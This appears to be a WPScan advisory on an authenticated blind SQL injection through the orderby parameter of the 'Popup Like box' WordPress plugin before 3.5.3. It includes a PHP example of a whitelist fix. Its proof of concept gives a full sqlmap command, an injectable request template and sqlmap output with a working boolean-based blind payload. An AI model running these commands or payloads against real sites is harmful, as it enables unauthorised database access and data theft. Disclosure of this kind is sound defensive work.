wpvulndb / duongtq
WPVDB-ID: 9C0164F2-464B-4876-A48F-C0EBD63CF397
History: Jun 29, 2021 - 12:00 a.m.

Popup Like box - Page Plugin < 3.5.3 - Authenticated Blind SQL Injections

2021-06-29 00:00:00
duongtq
wpscan.com
8

EPSS: 0.001 (Low), Percentile: 37.8%

The get_fb_likeboxes() function in the plugin did not whitelist or otherwise validate the orderby parameter before using it in SQL statements passed to get_results() DB calls, leading to SQL injection in the admin dashboard.
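As an added illustration (not the plugin's own code, which is not reproduced here), the function below shows the ORDER BY handling that prevents this class of bug in a WordPress $wpdb->get_results() call: the vulnerable pattern the advisory describes is shown in a comment next to the whitelisted version. The function, table and column names are assumptions.

```php
<?php
// Added example, not code from the plugin. Assumes a hypothetical table
// $wpdb->prefix . 'ays_fb_likeboxes' with the columns listed below.
function example_get_fb_likeboxes( $orderby, $order ) {
    global $wpdb;
    $table = $wpdb->prefix . 'ays_fb_likeboxes'; // assumed table name

    // Vulnerable pattern (what the advisory describes): request values
    // reach the ORDER BY clause unchanged. Identifiers cannot be bound
    // with $wpdb->prepare(), so prepare() alone does not fix this.
    //   $sql = "SELECT * FROM $table ORDER BY $orderby $order";

    // Hardened pattern: both identifiers are replaced by a value from a
    // fixed list, so no request-controlled string enters the SQL text.
    $allowed_columns = array( 'id', 'title', 'date_created' ); // assumed columns
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = 'id'; // safe default for anything not on the list
    }
    $order = ( 'DESC' === strtoupper( (string) $order ) ) ? 'DESC' : 'ASC';

    // $orderby and $order now only ever hold constants defined above.
    $sql = "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
    return $wpdb->get_results( $sql, ARRAY_A );
}
```

WordPress also ships sanitize_sql_orderby(), but it only checks that the value looks like an ORDER BY expression, not that the column is one the plugin intends to expose, so an explicit whitelist as above is the stronger check.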

PoC

SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs

With r.txt being the GET or POST request used to sort items in the plugin menu:

GET /wp-admin/admin.php?page=…&orderby=id--&order=desc HTTP/1.1
Host: …
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: …
Upgrade-Insecure-Requests: 1

SQLMAP OUTPUT:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=…&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0

CPE Name                     Operator   Version
ays-facebook-popup-likebox   lt         3.5.3

